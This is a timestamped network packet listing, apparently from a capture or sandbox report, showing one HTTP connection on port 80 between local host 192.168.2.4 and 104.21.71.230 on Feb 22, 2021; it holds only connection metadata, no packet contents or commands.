Feb 22, 2021 09:13:34.025413036 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.025415897 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.025451899 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.025778055 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.026251078 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.026268005 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.026283979 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.026299000 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.026314974 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.026329994 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.026341915 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.027156115 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.027178049 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.027199030 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.027208090 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.027216911 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.027232885 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.027251959 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.027476072 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.028067112 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.028084993 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.028100014 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.028116941 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.028131962 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.028147936 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.028178930 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.028995037 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.029015064 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.029030085 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.029047966 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.029530048 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.029546976 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.029551029 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.029562950 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.029578924 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.029596090 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.029635906 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.029783964 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.030455112 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.030476093 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.030493021 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.030509949 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.030525923 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.030527115 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.031388044 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.031404972 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.031411886 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.031424046 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.031441927 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.031457901 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.031457901 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.031491041 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.032299995 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.032318115 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.032334089 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.032366037 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.032375097 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.032392979 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.032392979 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.032437086 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.033226013 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.033243895 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.033260107 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.033276081 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.033284903 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.033292055 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.033730984 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.034126997 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.034145117 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.034161091 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.034177065 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.034189939 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.034198999 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.034218073 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.034328938 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.035010099 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.035034895 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.035051107 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.035065889 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.035088062 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.035094976 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.035124063 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.035938025 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.035963058 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.035983086 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.036000967 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.036010027 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.036016941 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.036061049 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.036161900 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.036860943 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.036879063 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.036895037 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.036911011 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.036930084 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.036953926 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.036982059 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.037774086 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.037791967 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.037815094 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.037821054 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.037853003 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.046551943 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.046586037 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.046600103 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.046675920 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.046696901 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.046715021 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.046730042 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.046749115 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.046749115 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.046767950 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.046783924 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.047620058 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.047640085 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.047642946 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.047661066 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.047677994 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.047693968 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.047775984 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.047784090 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.048573971 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.048592091 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.048607111 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.048624039 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.048625946 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.048640013 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.048657894 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.048683882 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.049458027 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.049474955 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.049490929 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.049505949 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.049520969 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.049556971 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.049566031 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.050374985 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.050391912 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.050410986 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.050422907 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.050430059 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.050446033 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.050466061 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.051285028 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.051301956 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.051304102 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.051328897 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.051345110 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.051345110 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.051383018 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.051415920 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.052237988 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.052256107 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.052272081 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.052283049 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.052287102 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.052303076 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.052311897 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.052387953 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.053142071 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.053160906 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.053179979 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.053199053 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.053211927 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.053215027 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.053312063 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.054044008 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.054064989 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.054080963 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.054097891 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.054114103 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.054121971 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.054200888 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.054240942 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.054958105 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.054976940 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.054994106 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.055010080 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.055011988 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.055022955 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.055080891 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.055872917 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.055953026 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.055955887 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.055972099 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.055988073 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.056004047 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.056051970 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.056058884 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.056787968 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.056806087 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.056822062 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.056838036 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.056840897 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.056860924 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.056881905 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.057732105 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.057754040 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.057771921 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.057789087 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.057821035 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.058243990 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.058259964 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.058275938 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.058293104 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.058299065 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.058307886 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.058696985 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.059150934 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.059182882 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.059201002 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.059207916 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.059225082 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.059241056 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.059246063 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.059278965 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.060147047 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.060164928 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.060180902 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.060197115 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.060206890 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.060223103 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.060583115 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.060960054 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.060977936 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.060992956 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.061007977 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.061013937 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.061029911 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.061032057 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.061121941 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.062479973 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.062500000 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.062516928 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.062532902 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.062549114 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.062551975 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.062577009 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.064613104 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.064631939 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.064647913 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.064663887 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.064681053 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.064683914 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.064697027 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.064713001 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.064730883 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.064748049 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.064752102 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.064764023 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.064881086 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.064901114 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.064901114 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.064918995 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.064924955 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.064935923 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.064953089 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.064970016 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.065361023 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.065377951 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.065395117 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.065406084 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.065422058 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.065424919 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.065438986 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.065466881 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.066224098 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.066240072 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.066258907 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.066277027 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.066277027 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.066293955 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.066363096 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.066369057 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.067105055 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.067122936 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.067138910 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.067154884 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.067171097 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.067176104 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.067929983 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.067955017 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.067972898 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.067989111 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.068007946 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.068332911 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.068455935 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.068473101 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.068504095 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.068519115 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.068521023 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.068537951 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.068613052 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.072594881 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.072612047 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.072632074 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.072649956 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.072665930 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.072669029 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.072701931 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.072726965 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.382925034 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.382980108 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.526387930 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.579346895 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.579375029 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.579394102 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.579411983 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.579431057 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.579452991 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.579480886 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.579500914 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.579504967 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.579525948 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.579530954 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.579557896 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.579566956 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.579582930 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.579603910 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.579615116 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.579765081 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.579770088 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.579788923 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.579807997 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.579826117 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.579842091 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.579849005 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.579869986 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.579876900 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.579893112 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.579917908 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.579920053 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.579941988 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.579962015 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.579983950 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.580003023 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.580009937 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.580065012 CET	49733	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:13:34.580740929 CET	80	49733	104.21.71.230	192.168.2.4
Feb 22, 2021 09:13:34.580765009 CET	80	49733	104.21.71.230	192.168.2.4
